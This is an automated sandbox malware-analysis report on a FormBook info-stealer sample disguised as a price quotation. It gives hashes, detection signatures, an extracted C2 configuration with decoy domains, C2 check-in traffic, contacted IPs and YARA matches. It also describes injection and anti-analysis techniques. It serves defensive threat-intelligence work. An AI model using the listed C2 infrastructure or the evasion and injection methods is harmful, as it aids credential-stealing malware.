Windows Analysis Report PRICE_REQUEST_QUOTATION.exe

Overview

General Information

Sample Name: PRICE_REQUEST_QUOTATION.exe
Analysis ID: 491948
MD5: 85589170af713a03ca622f94429c634a
SHA1: 4e0b9dfd13dd6e4b85bca4352be0cec2be9024d7
SHA256: dae6ba220bb0a34de731b57965753391343bfe96f9f3fa4fea48102d3377ccf7
Tags: exexloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

AV Detection:

Found malware configuration
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.nudesalon.digital/rgoe/"], "decoy": ["iamstevekelsey.com", "homesofchaparralcountryclub.com", "voiceyupcom.com", "searchengineeye.com", "charsantosart.com", "baila.madrid", "yota.store", "halloweenbaldhills.net", "futurodr.com", "centercodebase.com", "666b20.xyz", "4-6-2.com", "gspotworld.com", "rbb78.com", "1kingbet.com", "hzhongon.com", "dossierinc.com", "sustainablefoodfactory.com", "golfsol.art", "socialenterprisestudio.com", "sec-app.pro", "mrcsclass.com", "apseymarine.com", "restate.club", "thenewtocsin.com", "mingwotech.com", "llesman.com", "limiteditionft.com", "ff4c3dgsp.xyz", "travuleaf.com", "whatsaauction.com", "iktbn-c01.com", "dpcqkw.xyz", "mahoyaku-exhibition.com", "bimcell-tlyuklemezamani.com", "thejegroupllc.com", "limponomefacil.com", "bordandoartes.com", "parsvivid.com", "lowkeymastery.com", "missionsafegame.com", "estanciasanpablo.online", "overlandshare.com", "thevillageplumbers.com", "newhollandpurpose.com", "eastmillnorthandover.com", "patrickandmaxine.com", "appleluis.host", "immerseinagro.com", "vapkey.net", "babeshotnud.com", "rap8b55d.com", "afro-occidentstyle.com", "shahjahantravel.com", "toptaxxi.store", "adronesview.com", "kinesio-leman.com", "teelandcompany.com", "bycracky.com", "sehatbersama.store", "snackithalal.com", "nailsestetic.space", "vanmetrecco.com", "pondokbali.store"]}
Multi AV Scanner detection for submitted file
Source: PRICE_REQUEST_QUOTATION.exe Virustotal: Detection: 34%
Source: PRICE_REQUEST_QUOTATION.exe ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.nailsestetic.space/rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi8CF7.tmp\akepwc.dll ReversingLabs: Detection: 13%
Machine Learning detection for sample
Source: PRICE_REQUEST_QUOTATION.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 17.2.wscript.exe.c28870.0.unpack Avira: Label: TR/Patched.Ren.Gen
Source: 17.2.wscript.exe.516796c.4.unpack Avira: Label: TR/Patched.Ren.Gen

Compliance:

Uses 32bit PE files
Source: PRICE_REQUEST_QUOTATION.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscript.pdbGCTL source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000003.270120723.000000000E9A0000.00000004.00000001.sdmp, PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.341087342.00000000009B0000.00000040.00000001.sdmp, wscript.exe, 00000011.00000002.524645016.0000000004D4F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: PRICE_REQUEST_QUOTATION.exe, wscript.exe
Source: Binary string: wscript.pdb source: PRICE_REQUEST_QUOTATION.exe, 00000003.00000002.340904914.0000000000719000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00405EC2 FindFirstFileA,FindClose, 0_2_00405EC2
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_004054EC
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00402671 FindFirstFileA, 0_2_00402671

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49782 -> 154.208.173.139:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.futurodr.com
Source: C:\Windows\explorer.exe Network Connect: 154.208.173.139 80
Source: C:\Windows\explorer.exe Domain query: www.snackithalal.com
Source: C:\Windows\explorer.exe Network Connect: 109.106.246.165 80
Source: C:\Windows\explorer.exe Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe Domain query: www.4-6-2.com
Source: C:\Windows\explorer.exe Domain query: www.babeshotnud.com
Source: C:\Windows\explorer.exe Network Connect: 185.107.56.60 80
Source: C:\Windows\explorer.exe Domain query: www.nailsestetic.space
Source: C:\Windows\explorer.exe Domain query: www.appleluis.host
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Domain query: www.teelandcompany.com
Source: C:\Windows\explorer.exe Domain query: www.patrickandmaxine.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.nudesalon.digital/rgoe/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNSERVERSUS CNSERVERSUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=SDpSJcP09/DC8lpI6cAq3FUJJvXeBm+eY5pmIe7zBfPan+ozXFgSpcvx3IOXLkDu19py&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.patrickandmaxine.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=mDrA6fi9xoCJEIFZWb9JZI5ban60MroB6V8+OTFSy0K1Nt6g1YYxY5Is4mN6psbbGTdM&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.teelandcompany.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=ZkUnxSwgwNnUgDqrCPM5+5YAySuzXTkvHqygzq17wwh0dYOczX0iNUUGI1Jd50TOWJnd&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.nailsestetic.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=3YB68aNSooiMKLzi5nxxGSNHrBeWjD32XiQQxa052IhpgozgdHof2Vdu69obQAjF9Cm4&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.futurodr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /rgoe/?3fph-P=qAwo4FjRYg+cFYJClRGUgNSCxZXIn1VUyos+fUau4Qj4+ntS0isf6UMASXIJ1Ag59Aks&p64=N4Ih-Va0GVIpc HTTP/1.1 Host: www.babeshotnud.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: PRICE_REQUEST_QUOTATION.exe String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: PRICE_REQUEST_QUOTATION.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp String found in binary or memory: http://survey-smiles.com
Source: wscript.exe, 00000011.00000002.526445413.00000000052E2000.00000004.00020000.sdmp String found in binary or memory: https://bitninja.io
Source: unknown DNS traffic detected: queries for: www.appleluis.host

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Creates a DirectInput object (often for capturing keystrokes)
Source: PRICE_REQUEST_QUOTATION.exe, 00000000.00000002.273624416.000000000069A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Contains functionality to read data from the clipboard
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00404FF1

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.520482088.0000000000B30000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.272654309.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.521863147.0000000003090000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: PRICE_REQUEST_QUOTATION.exe
Uses 32bit PE files
Source: PRICE_REQUEST_QUOTATION.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PRICE_REQUEST_QUOTATION.exe.e7d0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.1.PRICE_REQUEST_QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340994927.0000000000910000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.300226054.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.316361223.0000000006D33000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.275161613.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340565896.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.340793636.00000000006C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.521170486.0000000001020000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
